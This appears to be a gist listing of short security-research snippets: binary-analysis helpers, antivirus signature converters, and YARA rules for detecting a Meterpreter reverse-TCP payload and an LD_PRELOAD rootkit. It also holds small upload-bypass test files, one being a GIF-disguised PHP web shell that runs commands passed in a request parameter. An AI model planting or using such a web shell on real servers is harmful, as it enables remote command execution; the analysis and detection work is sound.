This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import rzpipe # Using rizin framework. Replace with r2pipe for radare2 | |
import json | |
import hashlib | |
import os | |
class BinaryMetadata: | |
def __init__(self, path: str): | |
self.pipe = rzpipe.open(path) | |
self.bin_path = path |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from qiling import Qiling | |
from capstone import * | |
md = Cs(CS_ARCH_X86, CS_MODE_64) | |
def print_asm(ql, address, size): | |
# Credits -> https://isc.sans.edu/diary/Qiling+A+true+instrumentable+binary+emulation+framework/27372 | |
buf = ql.mem.read(address, size) | |
for i in md.disasm(buf, address): | |
opcode = ' '.join('{:02x}'.format(x) for x in i.bytes) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
dmknght<?php phpinfo();?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GIF89a <?php system($_GET['c']);?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GIF89a <?php phpinfo();?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GIF89a hehe đang làm exam nè |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import streams | |
import bitops | |
import strutils | |
import std/enumutils | |
const | |
db_name = "mpavbase.vdm.extracted" | |
type |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Compile: nim c --opt:speed clam_hashes_to_yara.nim | |
import strutils | |
const | |
clam_db_path = "/home/dmknght/Desktop/performance_comparison/main.hdb" | |
yr_converted_rule = "/home/dmknght/Desktop/performance_comparison/clam_hashes.yara" | |
type | |
HashSig = object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rule elf64_meterpreter_revtcp_raw { | |
meta: | |
description = "Detect Meterpreter ELF 64 staged reverse TCP no encoders" | |
strings: | |
$ = {6a 22 [4] 0f 05 [10] 6a 29 [8] 0f 05} | |
condition: | |
all of them | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import "elf" | |
/* | |
When system is infected by this rootkit | |
all processes load malicious lib (LD_PRELOAD) | |
It's possible to detect via strings, however, | |
current Yara version doesn't load ELF header | |
of mapped file. | |
*/ |